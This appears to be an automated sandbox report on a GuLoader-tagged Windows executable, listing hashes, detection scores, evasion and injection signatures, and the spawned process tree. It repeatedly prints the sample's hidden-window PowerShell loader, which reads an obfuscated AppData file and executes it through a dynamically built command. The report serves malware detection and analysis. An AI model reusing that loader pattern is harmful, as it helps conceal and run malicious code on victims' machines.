Windows Analysis Report
Ej86aa7Ki7.exe

Overview

General Information

Sample name: Ej86aa7Ki7.exe (renamed because the original name is a hash value)
Original sample name: 05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765.exe
Analysis ID: 1587855
MD5: cc768b964d98fa2d0cf4d9089176c6b9
SHA1: 5150a1c337194f1d224cc71a5487c398c12e94f6
SHA256: 05199e2da28bae00c03632e937ba49adba3bd5c9ef102e14639de784a82eb765
Tags: exe, GuLoader, signed, user-adrian__luca

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Suspicious powershell command line found
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

  • System is w10x64
  • Ej86aa7Ki7.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\Ej86aa7Ki7.exe" MD5: CC768B964D98FA2D0CF4D9089176C6B9)
    • powershell.exe (PID: 4796 cmdline: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SIHClient.exe (PID: 6160 cmdline: C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)
      • msiexec.exe (PID: 360 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5228 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1856 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6120 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5600 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5800 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6284 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1720 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1568 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 2076 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2292 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1628 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6596 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 528 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1352 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2452 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6360 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3936 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 5596 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6156 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 892 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6428 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2804 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5416 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6100 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6200 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 3276 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6152 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5448 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5484 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3220 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
No configs have been found
No yara matches
Sigma rule match: Process started
  Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data:
    Command: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
    CommandLine: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
    CommandLine|base64offset|contains: v,)^
    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"
    ParentImage: C:\Users\user\Desktop\Ej86aa7Ki7.exe
    ParentProcessId: 2276
    ParentProcessName: Ej86aa7Ki7.exe
    ProcessCommandLine: powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
    ProcessId: 4796
    ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Ej86aa7Ki7.exe; Virustotal: Detection: 63%
Source: Ej86aa7Ki7.exe; ReversingLabs: Detection: 60%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 84.4% probability
Source: Ej86aa7Ki7.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ej86aa7Ki7.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_0040287E FindFirstFileW,0_2_0040287E
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.4.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: SIHClient.exe, 00000004.00000003.2211938438.0000017F02A99000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ba33d4e
Source: Ej86aa7Ki7.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SIHClient.exe, 00000004.00000003.2213230493.0000017F02A68000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2212798692.0000017F02A6B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.a
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
Source: C:\Windows\System32\SIHClient.exe; File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP3C1B.tmp
Source: C:\Windows\System32\SIHClient.exe; File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP4668.tmp
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_004068DA
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_00404CED
Source: Ej86aa7Ki7.exe; Static PE information: invalid certificate
Source: Ej86aa7Ki7.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine; Classification label: mal68.evad.winEXE@4487/19@0/0
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404771
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Code function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; File created: C:\Users\user\AppData\Roaming\afdragsordning
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\SIHClient.exe; Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; File created: C:\Users\user\AppData\Local\Temp\nsaF60A.tmp
Source: Ej86aa7Ki7.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\SIHClient.exe; File read: C:\Windows\System32\drivers\etc\hosts (4 occurrences)
Source: Ej86aa7Ki7.exe; Virustotal: Detection: 63%
Source: Ej86aa7Ki7.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; File read: C:\Users\user\Desktop\Ej86aa7Ki7.exe
Source: unknown; Process created: C:\Users\user\Desktop\Ej86aa7Ki7.exe "C:\Users\user\Desktop\Ej86aa7Ki7.exe"
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Blinn=$Fysioterapiens.SubString(29179,3);.$Blinn($Fysioterapiens)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (11 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" (10 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe" (5 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv LjRh2CI4qEuakRNETXm55Q.0.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
